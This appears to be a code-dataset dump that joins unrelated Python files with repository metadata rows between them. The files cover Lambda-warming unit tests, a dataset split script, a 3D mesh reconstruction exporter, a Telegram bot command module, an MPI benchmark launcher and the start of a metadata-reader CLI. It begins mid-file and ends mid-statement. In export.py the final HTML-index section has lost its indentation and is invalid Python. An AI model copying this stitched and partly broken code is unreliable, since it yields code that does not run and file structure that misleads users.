        self.assertIsInstance(r, dict)
        # Test response dict keys
        self.assertIn('status', r.keys())
        self.assertIn('msg', r.keys())
        self.assertIn('data', r.keys())
        self.assertIn('error', r.keys())
        self.assertIn('original_request', r.keys())
        # Test response dict values
        self.assertEqual(r['status'], 200)
        self.assertIsNone(r['msg'])
        self.assertIsNone(r['data'])
        self.assertIsNone(r['error'])
        self.assertIsNone(r['original_request'])
    def test_build_full(self):
        '''Test a response with all attributes'''
        # All optional fields populated; build must pass them through verbatim.
        msg = 'There\'s so much more to you than you know, not just pain and anger.' # NOQA
        original_request = {
            'Waitress': 'Are you drinking to forget?',
            'Wolverine': 'No, I\'m drinking to remember.',
        }
        error = {
            'Clothing': 'Should not heal with Wolverine\'s body.',
        }
        r = build(
            status=200,
            msg=msg,
            data={'professor': '<NAME>'},
            error=error,
            original_request=original_request,
        )
        self.assertEqual(r['msg'], msg)
        self.assertIsInstance(r['data'], dict)
        self.assertIn('professor', r['data'])
        self.assertEqual(r['data']['professor'], '<NAME>')
        self.assertEqual(r['error'], error)
        self.assertEqual(r['original_request'], original_request)
class TestUtils(unittest.TestCase):
    '''Test utility functions from xlibs.utils.'''
    @patch('xlibs.utils.boto3')
    def test_get_object_from_s3(self, boto3):
        '''Test function that gets objects from S3 storage'''
        # boto3 is fully mocked: we only verify the call chain
        # session -> client('s3') -> get_object(Bucket, Key).
        utils.get_object_from_s3(
            bucket='x-mansion',
            object_key='<NAME>',
        )
        boto3.session.Session.assert_called()
        client = boto3.session.Session().client
        client.assert_called_with('s3')
        s3 = client()
        s3.get_object.assert_called()
        s3.get_object.assert_called_with(
            Bucket='x-mansion',
            Key='<NAME>',
        )
    def test_get_function_name(self):
        '''Test script that gets a function name from serverless.yml'''
        # Function names follow the pattern "xlambda-<function>-<stage>".
        function_name = utils.get_function_name(function='wolverine')
        self.assertEqual(function_name, f'xlambda-wolverine-{constants.STAGE}')
class TestMutants(unittest.TestCase):
    '''Test Mutant classes from xlibs.mutant.'''
    @patch('xlibs.mutant.async_lambda')
    def test_execute(self, async_lambda):
        '''Test execution of Lambda invocations'''
        # Mutant.execute must forward the requests unchanged to
        # async_lambda.invoke_all together with the configured region.
        requests = [
            {'function_name': 'test1', 'payload': {'foo': 'bar'}},
            {'function_name': 'test2', 'payload': {'foo': 'bar'}},
            {'function_name': 'test3', 'payload': {'foo': 'bar'}},
            {'function_name': 'test4', 'payload': {'foo': 'bar'}},
            {'function_name': 'test5', 'payload': {'foo': 'bar'}},
        ]
        mutant_obj = mutant.Mutant()
        mutant_obj.execute(requests=requests)
        async_lambda.invoke_all.assert_called()
        async_lambda.invoke_all.assert_called_with(
            requests=requests,
            region=constants.REGION,
        )
    def test_cyclops_container_count(self):
        '''Test counting of how many containers should be warmed up'''
        target = {
            'name': 'Charles-Xavier',
            'region': 'us-east-1',
            'settings': {},
            'forecast': [4, 15, 2],
            'scaling': None,
        }
        cyclops = mutant.Cyclops()
        cyclops.aim(target=target)
        # forecast max is 15; the result is clamped by max_containers
        # and max_concurrency (see the three scaling scenarios below).
        cyclops._target.scaling = get_scaling(1, 10, 50)
        self.assertEqual(cyclops.containers_to_warm, 10)
        cyclops._target.scaling = get_scaling(1, 20, 50)
        self.assertEqual(cyclops.containers_to_warm, 15)
        cyclops._target.scaling = get_scaling(1, 20, 8)
        self.assertEqual(cyclops.containers_to_warm, 8)
def get_scaling(
    min_containers: int = 1,
    max_containers: int = 10,
    max_concurrency: int = 50,
) -> Dict:
    """Build a scaling-settings dict used by the Cyclops tests.

    A plain dict literal replaces the original dict(zip(...)) construction,
    which obscured the key/value pairing.
    """
    return {
        'min_containers': min_containers,
        'max_containers': max_containers,
        'max_concurrency': max_concurrency,
    }
| 2.75 | 3 |
prep_data/split.py | samiraabnar/DistillingInductiveBias | 10 | 12765060 | <filename>prep_data/split.py<gh_stars>1-10
import sys
import os
import errno
import random
from util.text_util import deps_from_tsv, deps_to_tsv
def make_splits(fname, expr_dir, prop_train=0.1, prop_valid=0.01):
    """Shuffle the dependency data in *fname* and write train/valid/test TSVs.

    :param fname: input TSV of dependency records (read via deps_from_tsv)
    :param expr_dir: output directory; created if missing (parents included)
    :param prop_train: fraction of records written to train.tsv
    :param prop_valid: fraction of records written to valid.tsv; the
        remainder goes to test.tsv
    """
    # for reproducibility
    random.seed(42)
    print('| read in the data')
    data = deps_from_tsv(fname)
    print('| shuffling')
    random.shuffle(data)
    n_train = int(len(data) * prop_train)
    n_valid = int(len(data) * prop_valid)
    train = data[:n_train]
    valid = data[n_train: n_train+n_valid]
    test = data[n_train+n_valid:]
    # makedirs(exist_ok=True) replaces the manual os.mkdir + EEXIST check.
    os.makedirs(expr_dir, exist_ok=True)
    print('| splitting')
    deps_to_tsv(train, os.path.join(expr_dir, 'train.tsv'))
    deps_to_tsv(valid, os.path.join(expr_dir, 'valid.tsv'))
    deps_to_tsv(test, os.path.join(expr_dir, 'test.tsv'))
    print('| done!')
if __name__ == '__main__':
    # Usage: split.py <input.tsv> <output_dir>
    make_splits(sys.argv[1], sys.argv[2])
export.py | mickare/Robust-Reconstruction-of-Watertight-3D-Models | 6 | 12765061 | <reponame>mickare/Robust-Reconstruction-of-Watertight-3D-Models
"""
Export a html page with each step visualized.
"""
import os
from typing import Optional, Sequence
import numba
import numpy as np
import pytorch3d.structures
import torch
from example import Example, example_config, example_load
from reconstruction import mesh_extraction
from reconstruction.data.chunks import ChunkGrid
from reconstruction.filters.dilate import dilate
from reconstruction.mathlib import Vec3i
from reconstruction.medial_axis_propagating import crust_fix
from reconstruction.mincut import MinCut
from reconstruction.reconstruction import scale_model, crust_dilation, plot_voxels, diffuse, fill_components, \
cleanup_components
from reconstruction.render.cloud_render import CloudRender
from reconstruction.render.voxel_render import VoxelRender
from reconstruction.utils import timed
numba.config.THREADING_LAYER = 'omp'  # use the OpenMP threading backend for numba
# Configuration, modify here to change the model
CHUNKSIZE = 16  # edge length (in voxels) of one ChunkGrid chunk
RESOLUTION_INIT = 64  # initial voxel resolution of the scaled model
example = Example.BunnyFixed  # which example model to reconstruct
STEPS = 3  # number of resolution-doubling refinement iterations
APPROX_MEDIAL_AXIS = False  # enable the approximate medial-axis crust fix
if __name__ == '__main__':
    # --- Setup: load the example model, voxelize it and plot the raw crust ---
    # Set initial resolution
    resolution = RESOLUTION_INIT
    medial_name = "_medial" if APPROX_MEDIAL_AXIS else ""
    name = f"{example.name}{medial_name}"
    # Export path
    path = os.path.join("result", name)
    os.makedirs(path, exist_ok=True)
    plots = []  # collects paths of the exported html figures for the index page
    print("Loading model")
    with timed("\tTime: "):
        data = example_load(example)
        cfg = example_config[example]
        dilations_max = cfg["dilations_max"]
        dilations_reverse = cfg["dilations_reverse"]
    data_pts, data_offset, data_scale = scale_model(data, resolution=resolution)
    model: ChunkGrid[np.bool8] = ChunkGrid(CHUNKSIZE, dtype=np.bool8, fill_value=np.bool8(False))
    model[data_pts] = True
    model.pad_chunks(2)
    model.cleanup()
    # Plot only a part of the model points (large models will freeze the browser)
    plot_model: Optional[np.ndarray] = data_pts[::5]
    crust: ChunkGrid[np.bool8] = model.copy()
    crust.cleanup(remove=True)
    # Model view
    ren = VoxelRender()
    fig = ren.make_figure()
    fig.add_trace(ren.grid_voxel(crust, opacity=0.1, name='Initial'))
    fig.add_trace(CloudRender().make_scatter(plot_model, size=1, name='Model'))
    plots.append(os.path.join(path, "model.html"))
    fig.write_html(plots[-1], include_plotlyjs='cdn')
    # --- Dilation: grow the crust until it separates outer (2) / inner (3) components ---
    print("Dilation")
    with timed("\tTime: "):
        crust, components, dilation_step = crust_dilation(crust, max_steps=dilations_max,
                                                          reverse_steps=dilations_reverse)
    # assert components._fill_value == 2
    fig = plot_voxels(components == 0, components, title=f"Initial Dilation")
    plots.append(os.path.join(path, f"dilation_start.html"))
    fig.write_html(plots[-1], include_plotlyjs='cdn')
    # crust_outer/crust_inner are the crust voxels touching the outer (2)
    # respectively inner (3) flood-fill component.
    crust_dilate = dilate(crust)
    outer_fill = components == 2
    crust_outer = outer_fill & crust_dilate
    crust_inner = (components == 3) & crust_dilate
    assert crust_dilate._fill_value == False
    assert outer_fill._fill_value == True
    assert crust_outer._fill_value == False
    assert crust_inner._fill_value == False
    """
    Increase resolution and make the crust_fixmesh approximation finer
    """
    # --- Iterative refinement: per step, fix the crust, diffuse, min-cut,
    # then double the resolution and rebuild; finally extract + smooth the mesh ---
    for resolution_step in range(0, STEPS):
        print(f"RESOLUTION STEP: {resolution_step}")
        path_step = os.path.join(path, str(resolution_step))
        os.makedirs(path_step, exist_ok=True)
        if APPROX_MEDIAL_AXIS:
            """
            Approximate Voxel near Medial Axis, by propagating a Normal field inwards.
            Then for each voxel compute a normal cone and mark the voxel as inner component when the cone angle is greater than 90°.
            """
            print("Crust-Fix")
            with timed("\tTime: "):
                medial_axis, medial_figs = crust_fix(
                    crust, outer_fill, crust_outer, crust_inner,
                    min_distance=dilation_step,
                    data_pts=plot_model,
                    return_figs=True
                )
                crust_inner |= medial_axis
            for fig_name, fig in medial_figs.items():
                plots.append(os.path.join(path_step, f"{fig_name}.html"))
                fig.write_html(plots[-1], include_plotlyjs='cdn')
        # # crust_inner[model] = False  # Remove model voxels if they have been added by the crust fix
        print("Render Crust")
        with timed("\tTime: "):
            ren = VoxelRender()
            fig = ren.make_figure(title=f"Step-{resolution_step}: Crust")
            fig.add_trace(ren.grid_voxel(crust_outer, opacity=0.1, name='Outer'))
            fig.add_trace(ren.grid_voxel(crust_inner, opacity=1.0, name='Inner'))
            if plot_model is not None:
                fig.add_trace(CloudRender().make_scatter(plot_model, size=0.7, name='Model'))
            plots.append(os.path.join(path_step, f"crust.html"))
            fig.write_html(plots[-1], include_plotlyjs='cdn')
        print("Diffusion")
        with timed("\tTime: "):
            diff = diffuse(model, repeat=3)
        print("Plot-Diffusion")
        with timed("\tTime: "):
            ren = CloudRender()
            fig = ren.make_figure()
            # Cut in half: drop/trim chunks above the model's mid z-plane so
            # the diffusion field interior is visible in the plot.
            diff_mask = (diff != 1.0) & crust
            half = (np.max(data_pts, axis=0) + np.min(data_pts, axis=0)).astype(int) // 2
            half_chunk = half // diff_mask.chunk_size
            half_chunk_split = half[2] % diff_mask.chunk_size
            for index in list(diff_mask.chunks.keys()):
                if index[2] > half_chunk[2]:
                    del diff_mask.chunks[index]
                elif index[2] == half_chunk[2]:
                    ch = diff_mask.chunks.get(index)
                    arr = ch.to_array()
                    arr[:, :, half_chunk_split:] = False
                    ch.set_array(arr)
            items = list(diff.items(mask=diff_mask))
            items.sort(key=lambda e: e[0][2] * 1024 + e[0][1] + e[0][0])
            points, values = zip(*items)  # type: Sequence[Vec3i], Sequence
            pts = np.array(points, dtype=np.float32) + 0.5
            fig.add_trace(ren.make_scatter(
                pts,
                name="Diffusion",
                marker=dict(
                    size=2.0,
                    opacity=0.7,
                    colorscale='Viridis',
                    color=np.array(values)
                ),
                mode="markers",
            ))
            plots.append(os.path.join(path_step, f"diffusion.html"))
            fig.write_html(plots[-1], include_plotlyjs='cdn')
        print("MinCut")
        with timed("\tTime: "):
            # The thin crust is the voxel set shared by both cut segments.
            mincut = MinCut(diff, crust, crust_outer, crust_inner)
            segment0, segment1 = mincut.grid_segments()
            thincrust = segment0 & segment1
        print("Render")
        with timed("\tTime: "):
            ren = VoxelRender()
            fig = ren.make_figure(title=f"Step-{resolution_step}: Segments")
            fig.add_trace(ren.grid_voxel(segment0, opacity=0.1, name='Segment 0'))
            fig.add_trace(ren.grid_voxel(segment1, opacity=0.1, name='Segment 1'))
            fig.add_trace(ren.grid_voxel(thincrust, opacity=1.0, name='Join'))
            if plot_model is not None:
                fig.add_trace(CloudRender().make_scatter(plot_model, size=1, name='Model'))
            plots.append(os.path.join(path_step, f"mincut.html"))
            fig.write_html(plots[-1], include_plotlyjs='cdn')
        print("Volumetric refinement")
        with timed("\tTime: "):
            # Rebuild model
            resolution *= 2
            data_pts, data_offset, data_scale = scale_model(data, resolution=resolution)
            model = ChunkGrid(CHUNKSIZE, np.bool8, fill_value=np.bool8(False))
            model[data_pts] = np.bool8(True)
            plot_model: Optional[np.ndarray] = data_pts[::5]
            # Build new crust
            crust = dilate(dilate(thincrust.split(2), steps=1) | dilate(model, steps=3))
            crust.cleanup(remove=True)
            crust.pad_chunks(1)
            components, count = fill_components(crust, max_components=5)
            cleanup_components(crust, components, count)
            outer_fill = (components == 2)
            outer_fill.cleanup(remove=True)
            crust_dilate = dilate(crust)
            crust_outer = outer_fill & crust_dilate
            crust_inner = (components == 3) & crust_dilate
            crust_outer.cleanup(remove=True)
            crust_inner.cleanup(remove=True)
            dilation_step = 2
            # Validate data
            assert crust._fill_value == False
            assert outer_fill._fill_value == True
            assert crust_outer._fill_value == False
            assert crust_inner._fill_value == False
    print("Extract mesh")
    with timed("\tTime: "):
        # Extraction
        mesh_extractor = mesh_extraction.MeshExtraction(mincut)
        vertices, faces = mesh_extractor.extract_mesh()
        ren = VoxelRender()
        fig = ren.make_figure()
        fig.add_trace(ren.make_mesh(vertices, faces, name='Mesh', flatshading=True))
        fig.add_trace(ren.make_wireframe(vertices, faces, name='Wireframe'))
        fig.update_layout(showlegend=True)
        plots.append(os.path.join(path_step, f"mesh_extraction.html"))
        fig.write_html(plots[-1], include_plotlyjs='cdn')
    print("Smoothing mesh")
    with timed("\tTime: "):
        # Smoothing (pytorch3d-based Laplacian-style smoothing of the vertices)
        pytorch_mesh = pytorch3d.structures.Meshes(verts=[torch.FloatTensor(vertices)],
                                                   faces=[torch.LongTensor(faces)])
        smoothed_vertices = mesh_extraction.Smoothing().smooth(vertices, faces, diff, pytorch_mesh)
        verts = smoothed_vertices.cpu().detach().numpy()
        faces = torch.cat(pytorch_mesh.faces_list()).cpu().detach().numpy()
        ren = VoxelRender()
        fig = ren.make_figure()
        fig.add_trace(ren.make_mesh(verts, faces, name='Mesh', flatshading=False))
        fig.add_trace(ren.make_wireframe(verts, faces, name='Wireframe'))
        fig.update_layout(showlegend=True)
        plots.append(os.path.join(path_step, f"mesh_final.html"))
        fig.write_html(plots[-1], include_plotlyjs='cdn')
links = ""
for p in plots:
rel_p = p[len(path) + 1:]
links += f"<li><a href=\"{rel_p}\" target=\"page\">{rel_p}</a></li>"
html = f"""<html>
<head>
<title>{name}</title>
<style>
html, body {{
height: 100%;
margin: 0;
}}
#iframe_page {{
width:100%;height:100%;
display: inline-block;
padding:0; margin:0;
}}
/* DivTable.com */
.divTable{{
display: table;
width: 100%; height:100%;
}}
.divTableRow {{
display: table-row;
}}
.divTableHeading {{
background-color: #EEE;
display: table-header-group;
}}
.divTableCell, .divTableHead {{
border: 1px solid #999999;
display: table-cell;
padding: 3px 10px;
}}
.divTableHeading {{
background-color: #EEE;
display: table-header-group;
font-weight: bold;
}}
.divTableFoot {{
background-color: #EEE;
display: table-footer-group;
font-weight: bold;
}}
.divTableBody {{
display: table-row-group;
}}
</style>
</head>
<body>
<div class="divTable">
<div class="divTableBody">
<div class="divTableRow">
<div class="divTableCell" style="vertical-align: top; max-width: 40px;">
<div>
<ul>
<li><a href="..">..</a></li>
</ul>
<ul>
{links}
</ul>
</ul>
</div>
</div>
<div class="divTableCell" style="position:relative;padding:0; margin:0;"><iframe src="model.html" name="page" id="iframe_page"></iframe></div>
</div>
</div>
</div>
</body>
</html>
"""
with open(os.path.join(path, "index.html"), 'wt') as fp:
fp.writelines(html)
| 2.4375 | 2 |
uscensus/tests/errors.py | nkrishnaswami/census | 4 | 12765062 | from ..util.errors import CensusError, DBError
def CensusError_test():
    """CensusError instances must behave as standard exceptions."""
    assert isinstance(CensusError("test"), Exception)
def DBError_test():
    """DBError must derive from CensusError and thus from Exception."""
    error = DBError("test")
    for base in (CensusError, Exception):
        assert isinstance(error, base)
| 2.828125 | 3 |
commands/general.py | murilo-toddy/telegram-ss | 1 | 12765063 | <gh_stars>1-10
from telegram import Update, ParseMode, ReplyKeyboardRemove, ReplyKeyboardMarkup
from telegram.ext import CallbackContext, CommandHandler
import bot
from config import COMMANDS_SHEET_ID, commands
# Registers execution of certain command
def log_command(cmd: str) -> None:
    """Print a console marker noting that *cmd* was invoked."""
    print(f"\n [!!] Command {cmd} called")
# Default message sending method, using HTML format
def send_message(update: Update, ctx: CallbackContext, text: str) -> None:
    """Send HTML-formatted *text* to the chat the update originated from."""
    ctx.bot.send_message(chat_id=update.effective_chat.id, text=text, parse_mode=ParseMode.HTML)
# Sends message to a specific channel
def send_message_to(ctx: CallbackContext, id: int, text: str) -> None:
    """Send HTML-formatted *text* to an explicit chat/channel *id*."""
    ctx.bot.send_message(chat_id=id, text=text, parse_mode=ParseMode.HTML)
# Uses reply method to send message
def reply_text(update: Update, text: str, keyboard: ReplyKeyboardMarkup = ReplyKeyboardRemove()):
    """Reply to the incoming message with HTML *text*.

    By default the reply removes any custom keyboard.
    NOTE(review): the default is a single ReplyKeyboardRemove() instance
    created at import time and shared across calls — confirm the object is
    effectively immutable in python-telegram-bot.
    """
    update.message.reply_text(text, parse_mode=ParseMode.HTML, reply_markup=keyboard)
# Gets text from commands listed in Bot Commands spreadsheet
def spreadsheet_return_text(update: Update, ctx: CallbackContext) -> None:
    """Reply with the response text configured for the invoked command.

    Rows of the "cmd" sheet are (command_name, response_text). The sheet is
    fetched a single time per invocation (the previous implementation made
    two network calls), and an unknown command is logged instead of raising
    an uncaught ValueError inside the handler.
    """
    cmd = update.message.text[1:]
    log_command(cmd)
    rows = commands.sheet("cmd").get_all_values()[1:]
    for row in rows:
        if row[0] == cmd:
            send_message(update, ctx, row[1])
            return
    print(f"\n [!] Command {cmd} not found in spreadsheet")
# Reload commands listed in Bot Commands spreadsheet
def update_sheet_commands(update: Update, ctx: CallbackContext) -> None:
    """Handler for a manual refresh: re-register commands and confirm to the user."""
    log_command("refresh")
    bot.handler.register_commands(bot.dsp)
    send_message(update, ctx, "Comandos atualizados com sucesso!")
# Callback function to reload commands from spreadsheet
def reload_spreadsheet_commands(ctx: CallbackContext):
    """Job-queue callback: add one CommandHandler per spreadsheet row.

    NOTE(review): handlers are added on every run without removing earlier
    ones, so repeated runs appear to accumulate duplicates — confirm whether
    the dispatcher deduplicates handlers.
    """
    for cmd in commands.sheet("cmd").get_all_values()[1:]:
        # cmd is a row: [command_name, response_text]
        bot.dsp.add_handler(CommandHandler(command=cmd[0], callback=spreadsheet_return_text))
    print("\n [!] Spreadsheet commands reloaded")
# Create repeating task to reload commands from spreadsheet
def create_auto_refresh():
    """Schedule reload_spreadsheet_commands to run every 900 seconds."""
    bot.bot.job_queue.run_repeating(reload_spreadsheet_commands, 900)
# Sends Bot Commands spreadsheet link
def send_sheet(update: Update, ctx: CallbackContext) -> None:
    """Send an HTML anchor linking to the Bot Commands spreadsheet."""
    response_text = (
        f"<a href='https://docs.google.com/spreadsheets/d/{COMMANDS_SHEET_ID}/edit#gid=0'>Planilha de Comandos</a>"
    )
    send_message(update, ctx, response_text)
| 2.578125 | 3 |
arcane/extras/benchs/bench_microhydro.py | cedricga91/framework | 16 | 12765064 | #!/usr/bin/env python3
# Note: il faut au moins python 3.5 (pour subprocess.run())
import argparse
import subprocess
from string import Template
from argparse import RawDescriptionHelpFormatter
# Arcane case-file template; $-placeholders are filled via string.Template.
xstr = """<?xml version="1.0"?>
<case codename="ArcaneTest" xml:lang="en" codeversion="1.0">
 <arcane>
  <title>Tube a choc de Sod</title>
  <timeloop>ArcaneHydroLoop</timeloop>
  <modules>
   <module name="ArcaneLoadBalance" active="$do_load_balance" />
  </modules>
 </arcane>
 <meshes>
  <mesh>
   <ghost-layer-builder-version>4</ghost-layer-builder-version>
   <generator name="Cartesian3D" >
    <nb-part-x>$nb_part_x</nb-part-x>
    <nb-part-y>$nb_part_y</nb-part-y>
    <nb-part-z>$nb_part_z</nb-part-z>
    <origin>1.0 2.0 3.0</origin>
    <generate-sod-groups>true</generate-sod-groups>
    <x><n>$nb_cell_x</n><length>2.0</length></x>
    <y><n>$nb_cell_y</n><length>2.0</length></y>
    <z><n>$nb_cell_z</n><length>4.0</length></z>
   </generator>
   <initialization>
    <variable><name>Density</name><value>1.0</value><group>ZG</group></variable>
    <variable><name>Density</name><value>0.125</value><group>ZD</group></variable>
    <variable><name>Pressure</name><value>1.0</value><group>ZG</group></variable>
    <variable><name>Pressure</name><value>0.1</value><group>ZD</group></variable>
    <variable><name>AdiabaticCst</name><value>1.4</value><group>ZG</group></variable>
    <variable><name>AdiabaticCst</name><value>1.4</value><group>ZD</group></variable>
   </initialization>
  </mesh>
 </meshes>
 <arcane-checkpoint>
  <do-dump-at-end>false</do-dump-at-end>
 </arcane-checkpoint>
 <arcane-load-balance>
  <active>true</active>
  <partitioner name="Metis" />
  <period>5</period>
  <statistics>true</statistics>
  <max-imbalance>0.01</max-imbalance>
  <min-cpu-time>0</min-cpu-time>
 </arcane-load-balance>
 <!-- Configuration du module hydrodynamique -->
 <simple-hydro>
  <deltat-init>0.00001</deltat-init>
  <deltat-min>0.000001</deltat-min>
  <deltat-max>0.0001</deltat-max>
  <final-time>0.2</final-time>
  <viscosity>cell</viscosity>
  <viscosity-linear-coef>.5</viscosity-linear-coef>
  <viscosity-quadratic-coef>.6</viscosity-quadratic-coef>
  <boundary-condition>
   <surface>XMIN</surface><type>Vx</type><value>0.</value>
  </boundary-condition>
  <boundary-condition>
   <surface>XMAX</surface><type>Vx</type><value>0.</value>
  </boundary-condition>
  <boundary-condition>
   <surface>YMIN</surface><type>Vy</type><value>0.</value>
  </boundary-condition>
  <boundary-condition>
   <surface>YMAX</surface><type>Vy</type><value>0.</value>
  </boundary-condition>
  <boundary-condition>
   <surface>ZMIN</surface><type>Vz</type><value>0.</value>
  </boundary-condition>
  <boundary-condition>
   <surface>ZMAX</surface><type>Vz</type><value>0.</value>
  </boundary-condition>
 </simple-hydro>
</case>
"""
# User-facing help text shown by argparse (kept in French on purpose).
epilog_doc = """
Ce script permet de spécifier et d'exécuter le test MicroHydro en MPI
sur N processeurs, chaque processeur ayant le même nombre de mailles.
Il permet donc des tests d'extensibilité faible (weak scaling).
Ce test doit s'exécuter dans le répertoire où Arcane a été compilé.
L'option '-n|--nb-proc' spécifie le nombre de processus. Si ce nombre
est supérieur à 32, il doit être un multiple de 32.
L'option '-s|--mesh-size' indique le nombre de chunks de mailles pour
chaque PE. La taille d'un chunk est de 2000 mailles. Par defaut le
nombre de chunk est de 10.
Il est possible de spécifier un repartitionnement via l'option
'-l|--loadbalance'. Dans ce cas, le repartitionnement aura lieu toutes
les 5 itérations. Arcane doit avec été compilé avec 'ParMetis' pour
que cela fonctionne.
"""
parser = argparse.ArgumentParser(description="MicroHydro bench", formatter_class=RawDescriptionHelpFormatter, epilog=epilog_doc)
required_arguments = parser.add_argument_group('required named arguments')
required_arguments.add_argument("-n", "--nb-proc", dest="nb_proc", action="store", help="number of processus", type=int, required=True)
parser.add_argument("-s", "--mesh-size", dest="mesh_size", action="store", help="size of mesh", type=int, default=10)
parser.add_argument("-l", "--load-balance", dest="do_load_balance", action="store_true", help="true if load balance is activated")
parser.add_argument("-m", "--max-iteration", dest="max_iteration", action="store", help="number of iteration to do", type=int, default=100)
parser.add_argument("-p", "--arcane-driver-path", dest="arcane_driver_path", action="store", help="arcane_test_driver path", type=str, default="./bin/arcane_test_driver")
args = parser.parse_args()
nb_proc = args.nb_proc
nb_cell_mult = args.mesh_size
# Above 32 PEs, only multiples of 32 are supported (8x4xK decomposition).
if nb_proc > 32 and nb_proc % 32 != 0:
    raise RuntimeError("Bad number of proc (should be a multiple of 32)")
s = Template(xstr)
# Number of parts along (X,Y,Z); X*Y*Z must equal the number of PEs.
nb_part_x = 8
nb_part_y = 4
nb_part_z = (nb_proc // 32)
# Below 32 PEs, use a dedicated decomposition per processor count.
if nb_proc == 24:
    nb_part_x, nb_part_y, nb_part_z = 4, 3, 2
elif nb_proc == 16:
    nb_part_x, nb_part_y, nb_part_z = 4, 2, 2
elif nb_proc == 12:
    nb_part_x, nb_part_y, nb_part_z = 3, 2, 2
elif nb_proc == 8:
    nb_part_x, nb_part_y, nb_part_z = 2, 2, 2
elif nb_proc == 4:
    nb_part_x, nb_part_y, nb_part_z = 2, 2, 1
elif nb_part_z == 0:
    nb_part_x, nb_part_y, nb_part_z = nb_proc, 1, 1
total_nb_part = nb_part_x * nb_part_y * nb_part_z
# Number of cells along (X,Y,Z); z scales with --mesh-size for weak scaling.
nb_cell_x = 20 * nb_part_x
nb_cell_y = 20 * nb_part_y
nb_cell_z = 5 * nb_part_z * nb_cell_mult
total_nb_cell = nb_cell_x * nb_cell_y * nb_cell_z
do_load_balance = "true" if args.do_load_balance else "false"
d = {
    "nb_part_x": nb_part_x, "nb_part_y": nb_part_y, "nb_part_z": nb_part_z,
    "nb_cell_x": nb_cell_x, "nb_cell_y": nb_cell_y, "nb_cell_z": nb_cell_z,
    "do_load_balance": do_load_balance
}
z = s.substitute(d)
print(z)
print("TotalNbCell=", total_nb_cell, " (per part=", total_nb_cell // total_nb_part, ")")
# Context manager guarantees the case file is flushed and closed before the
# solver is launched (the original used open/write/close by hand).
with open("test.arc", mode="w") as case_file:
    case_file.write(z)
command = [args.arcane_driver_path, "launch", "-n", str(nb_proc), "-m", str(args.max_iteration), "-We,ARCANE_NEW_MESHINIT,1", "test.arc"]
print(command)
subprocess.run(command)
| 2.234375 | 2 |
metareader/__main__.py | valossalabs/metadata-reader | 2 | 12765065 | <filename>metareader/__main__.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# PYTHON_ARGCOMPLETE_OK
"""Command-line user interface
"""
from __future__ import print_function, unicode_literals
from __future__ import absolute_import
from __future__ import division
import sys
from site import USER_BASE
import os
import errno
from io import open
import argparse
import logging
logger = logging.getLogger(__name__)
# import argcomplete
try:
# Python 3.0 and later
from urllib.request import urlopen
from urllib.error import HTTPError
except ImportError:
# Python 2
from urllib2 import urlopen
from urllib2 import HTTPError
import json
__dev__ = True
def restricted_float(float_arg):
    """Argparse type: parse *float_arg* as a float in the closed range [0.0, 1.0].

    Raises argparse.ArgumentTypeError when the value falls outside the range.
    """
    value = float(float_arg)
    if not 0.0 <= value <= 1.0:
        raise argparse.ArgumentTypeError("{} not in range [0.0, 1.0]".format(value))
    return value
def positive_int(int_arg):
    """Argparse type: parse *int_arg* as a strictly positive integer (1, 2, 3, ...).

    Raises argparse.ArgumentTypeError for zero or negative values.
    """
    value = int(int_arg)
    if value < 1:
        raise argparse.ArgumentTypeError("{} is not positive integer".format(value))
    return value
def image_size(xy_str):
    """Argparse type: parse an "(X, Y)" string into a tuple of two positive ints."""
    from ast import literal_eval
    width, height = literal_eval(xy_str)
    return (positive_int(width), positive_int(height))
def load_json(file_url_or_path):
    """Load and parse a JSON document from a URL or a local file path.

    The argument is first tried as a URL; when it is not a valid URL
    (``urlopen`` raises ``ValueError``) the function falls back to opening
    it as a local file path.

    :param file_url_or_path: URL or filesystem path of a JSON document
    :return: the parsed JSON content
    :raises HTTPError: the URL was valid but the request failed
    :raises IOError: the path fallback could not open the file
    :raises ValueError: the file contents are not valid JSON
    """
    try:
        # INPUT FILE AS URL
        json_file = urlopen(file_url_or_path)
        try:
            return json.loads(json_file.read())
        finally:
            # Close the connection whether or not parsing succeeded;
            # previously a bare try/except here could mask a NameError
            # when urlopen itself failed.
            json_file.close()
    except ValueError:  # invalid URL -> retry the argument as a path
        # INPUT FILE AS PATH
        with open(file_url_or_path, "r", encoding="utf-8") as json_file:
            return json.loads(json_file.read())
def input_metadata(file_url_or_path):
    """Argparse type: load a Valossa metadata JSON file from a path or URL.

    Wraps every loading failure into argparse.ArgumentTypeError so argparse
    reports it as an invalid command-line argument.
    """
    try:
        return load_json(file_url_or_path)
    except HTTPError as exc:
        raise argparse.ArgumentTypeError("Invalid url: {}\n{}".format(
            file_url_or_path, exc))
    except IOError as exc:
        raise argparse.ArgumentTypeError(
            "No such file found: {}\n{}".format(file_url_or_path, exc)
        )
    except ValueError as exc:
        raise argparse.ArgumentTypeError(
            "Input file not valid JSON-file: {}\n{}".format(file_url_or_path, exc)
        )
class ValidateExternalOntology(argparse.Action):
    """Argparse action that validates an (ONTOLOGY, ID) argument pair.

    Stores the pair as a tuple on the namespace; rejects ontologies that
    are not currently supported.
    """
    # Source: https://stackoverflow.com/a/8624107

    _SUPPORTED = ('gkg',)

    def __call__(self, parser, args, values, option_string=None):
        ontology, concept_id = values
        if ontology not in self._SUPPORTED:
            raise argparse.ArgumentError(
                self,
                "invalid choice: '{}' (currently supported external ontologies are: {})".format(
                    ontology, ", ".join(c for c in self._SUPPORTED)))
        setattr(args, self.dest, (ontology, concept_id))
class AddArguments:
    """Namespace of helpers that register the command-line arguments of each
    metareader sub-command on its argparse sub-parser.

    Each static method receives the sub-parser created in
    parse_user_arguments() and only adds arguments to it.
    """
    @staticmethod
    def list_detections(parser):
        """Register arguments for the ``list-detections`` sub-command."""
        parser.add_argument(
            "metadata_file", type=input_metadata,
            help="Valossa Core metadata file to examine"
        )
        parser.add_argument(
            "--output-file", default=None, metavar="FILE",
            help="Output results to FILE instead of stdout."
        )
        parser.add_argument(
            "-f", "--output-format",
            default="csv", choices=["csv", "free"],
            help="Choose one of the supported output formats."
        )
        parser.add_argument(
            "-n", "--n-most-prominent-detections-per-type", type=positive_int, metavar="N",
            help=("List only N most prominent detections from each detection type, "
                  "N given by user")
        )
        parser.add_argument(
            "-t", "--detection-types", default=None,
            metavar="TYPE", nargs="+",
            help="Space-separated list of detection types to read."
        )
        parser.add_argument(
            "-c", "--category", default=None,
            metavar="CATEGORY", nargs="+",
            help="Space separated list of categories."
        )
        parser.add_argument(
            "-l", "--detection-label", default=None, metavar="LABEL",
            help=("Detection label to read. "
                  "Example: dog")
        )
        parser.add_argument(
